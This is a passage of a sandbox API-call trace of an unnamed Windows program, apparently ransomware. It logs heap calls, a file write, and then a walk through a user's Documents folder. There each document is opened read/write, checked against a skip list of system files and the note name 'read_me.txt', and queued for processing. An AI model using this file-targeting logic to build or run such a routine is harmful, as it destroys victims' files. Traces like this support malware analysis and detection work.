hHeap=0x280000) returned 1 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.324] GetProcessHeap () returned 0x280000 [0074.324] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.324] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.325] GetProcessHeap () returned 0x280000 [0074.325] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.325] GetProcessHeap () returned 0x280000 [0074.326] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d533e8 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d533e8 | out: hHeap=0x280000) returned 1 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.326] GetProcessHeap () returned 0x280000 [0074.326] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.327] GetProcessHeap () returned 0x280000 [0074.327] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3d8 | out: hHeap=0x280000) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0074.328] SetFilePointerEx (in: hFile=0x770, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.328] WriteFile (in: hFile=0x770, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.328] WriteFile (in: hFile=0x770, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.328] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0074.328] GetProcessHeap () returned 0x280000 [0074.329] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0074.329] CloseHandle (hObject=0x770) returned 1 [0074.329] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 4 [0074.360] GetProcessHeap () returned 0x280000 [0074.360] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8c21078 [0074.360] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\*") returned 78 [0074.360] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a3c6a70, ftCreationTime.dwHighDateTime=0x1d4d47d, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0074.360] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\.") returned 78 [0074.360] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2a3c6a70, ftCreationTime.dwHighDateTime=0x1d4d47d, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0074.360] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\..") returned 79 [0074.360] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86d22fd0, ftCreationTime.dwHighDateTime=0x1d4d587, ftLastAccessTime.dwLowDateTime=0xb98de7c0, ftLastAccessTime.dwHighDateTime=0x1d4cdd5, ftLastWriteTime.dwLowDateTime=0xb98de7c0, ftLastWriteTime.dwHighDateTime=0x1d4cdd5, nFileSizeHigh=0x0, nFileSizeLow=0x142a4, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="6-VcrRO5FwPN.pps", cAlternateFileName="6-VCRR~1.PPS")) returned 1 [0074.360] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\6-VcrRO5FwPN.pps") returned 93 [0074.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\6-VcrRO5FwPN.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\jog4-t9rreaav9\\6-vcrro5fwpn.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x770 [0074.360] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="read_me.txt") returned 0x0 [0074.360] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="autoexec.bat") returned 0x0 [0074.360] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="desktop.ini") returned 0x0 [0074.360] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="autorun.inf") returned 0x0 [0074.360] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="ntuser.dat") returned 0x0 [0074.360] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="iconcache.db") returned 0x0 [0074.361] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="bootsect.bak") returned 0x0 [0074.361] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="boot.ini") returned 0x0 [0074.361] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="ntuser.dat.log") returned 0x0 [0074.361] StrStrW (lpFirst="6-vcrro5fwpn.pps", lpSrch="thumbs.db") returned 0x0 [0074.361] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 86 [0074.361] QueueUserWorkItem (Function=0x404e00, Context=0x770, Flags=0x0) returned 1 [0074.361] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b84c000, ftCreationTime.dwHighDateTime=0x1d4cdb3, ftLastAccessTime.dwLowDateTime=0x37f21b60, ftLastAccessTime.dwHighDateTime=0x1d4d49b, ftLastWriteTime.dwLowDateTime=0x37f21b60, ftLastWriteTime.dwHighDateTime=0x1d4d49b, nFileSizeHigh=0x0, nFileSizeLow=0x5ecb, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="bSjd3rhM.ppt", cAlternateFileName="")) returned 1 [0074.361] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\bSjd3rhM.ppt") returned 89 [0074.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\bSjd3rhM.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\jog4-t9rreaav9\\bsjd3rhm.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x774 [0074.361] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="read_me.txt") returned 0x0 [0074.361] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="autoexec.bat") returned 0x0 [0074.361] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="desktop.ini") returned 0x0 [0074.361] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="autorun.inf") returned 0x0 [0074.361] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="ntuser.dat") returned 0x0 [0074.361] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="iconcache.db") returned 0x0 [0074.361] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="bootsect.bak") returned 0x0 [0074.361] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="boot.ini") returned 0x0 [0074.361] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="ntuser.dat.log") returned 0x0 [0074.362] StrStrW (lpFirst="bsjd3rhm.ppt", lpSrch="thumbs.db") returned 0x0 [0074.362] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 87 [0074.362] QueueUserWorkItem (Function=0x404e00, Context=0x774, Flags=0x0) returned 1 [0074.362] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3766d220, ftCreationTime.dwHighDateTime=0x1d4cf47, ftLastAccessTime.dwLowDateTime=0x4f733840, ftLastAccessTime.dwHighDateTime=0x1d4c835, ftLastWriteTime.dwLowDateTime=0x4f733840, ftLastWriteTime.dwHighDateTime=0x1d4c835, nFileSizeHigh=0x0, nFileSizeLow=0x15595, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="LAQD3mxhd.pptx", cAlternateFileName="LAQD3M~1.PPT")) returned 1 [0074.362] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\LAQD3mxhd.pptx") returned 91 [0074.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\LAQD3mxhd.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\jog4-t9rreaav9\\laqd3mxhd.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a4 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="read_me.txt") returned 0x0 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="autoexec.bat") returned 0x0 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="desktop.ini") returned 0x0 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="autorun.inf") returned 0x0 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="ntuser.dat") returned 0x0 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="iconcache.db") returned 0x0 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="bootsect.bak") returned 0x0 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="boot.ini") returned 0x0 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="ntuser.dat.log") returned 0x0 [0074.362] StrStrW (lpFirst="laqd3mxhd.pptx", lpSrch="thumbs.db") returned 0x0 [0074.362] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 88 [0074.362] QueueUserWorkItem (Function=0x404e00, Context=0x7a4, Flags=0x0) returned 1 [0074.362] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb62f8c80, ftCreationTime.dwHighDateTime=0x1d4c82d, ftLastAccessTime.dwLowDateTime=0x7db99720, ftLastAccessTime.dwHighDateTime=0x1d4c746, ftLastWriteTime.dwLowDateTime=0x7db99720, ftLastWriteTime.dwHighDateTime=0x1d4c746, nFileSizeHigh=0x0, nFileSizeLow=0x21ae, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="NwDnbNiDH_4E54Xc.ots", cAlternateFileName="NWDNBN~1.OTS")) returned 1 [0074.362] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\NwDnbNiDH_4E54Xc.ots") returned 97 [0074.362] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\NwDnbNiDH_4E54Xc.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\jog4-t9rreaav9\\nwdnbnidh_4e54xc.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8dc [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="read_me.txt") returned 0x0 [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="autoexec.bat") returned 0x0 [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="desktop.ini") returned 0x0 [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="autorun.inf") returned 0x0 [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="ntuser.dat") returned 0x0 [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="iconcache.db") returned 0x0 [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="bootsect.bak") returned 0x0 [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="boot.ini") returned 0x0 [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="ntuser.dat.log") returned 0x0 [0074.363] StrStrW (lpFirst="nwdnbnidh_4e54xc.ots", lpSrch="thumbs.db") returned 0x0 [0074.363] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 89 [0074.363] QueueUserWorkItem (Function=0x404e00, Context=0x8dc, Flags=0x0) returned 1 [0074.363] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11215340, ftCreationTime.dwHighDateTime=0x1d4c571, ftLastAccessTime.dwLowDateTime=0x4a6330a0, ftLastAccessTime.dwHighDateTime=0x1d4c707, ftLastWriteTime.dwLowDateTime=0x4a6330a0, ftLastWriteTime.dwHighDateTime=0x1d4c707, nFileSizeHigh=0x0, nFileSizeLow=0x241f, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="OnhkYsM.doc", cAlternateFileName="")) returned 1 [0074.363] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\OnhkYsM.doc") returned 88 [0074.363] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\OnhkYsM.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\jog4-t9rreaav9\\onhkysm.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8e0 [0074.363] StrStrW (lpFirst="onhkysm.doc", lpSrch="read_me.txt") returned 0x0 [0074.363] StrStrW (lpFirst="onhkysm.doc", lpSrch="autoexec.bat") returned 0x0 [0074.363] StrStrW (lpFirst="onhkysm.doc", lpSrch="desktop.ini") returned 0x0 [0074.364] StrStrW (lpFirst="onhkysm.doc", lpSrch="autorun.inf") returned 0x0 [0074.364] StrStrW (lpFirst="onhkysm.doc", lpSrch="ntuser.dat") returned 0x0 [0074.364] StrStrW (lpFirst="onhkysm.doc", lpSrch="iconcache.db") returned 0x0 [0074.364] StrStrW (lpFirst="onhkysm.doc", lpSrch="bootsect.bak") returned 0x0 [0074.364] StrStrW (lpFirst="onhkysm.doc", lpSrch="boot.ini") returned 0x0 [0074.364] StrStrW (lpFirst="onhkysm.doc", lpSrch="ntuser.dat.log") returned 0x0 [0074.364] StrStrW (lpFirst="onhkysm.doc", lpSrch="thumbs.db") returned 0x0 [0074.364] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 90 [0074.364] QueueUserWorkItem (Function=0x404e00, Context=0x8e0, Flags=0x0) returned 1 [0074.364] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16b33310, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16b33310, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16b33310, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0074.364] wnsprintfW (in: pszDest=0x8c21078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\read_me.txt") returned 88 [0074.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\mxPjuqgnTcEZFOmeY\\Jog4-T9RreaaV9\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxpjuqgntcezfomey\\jog4-t9rreaav9\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 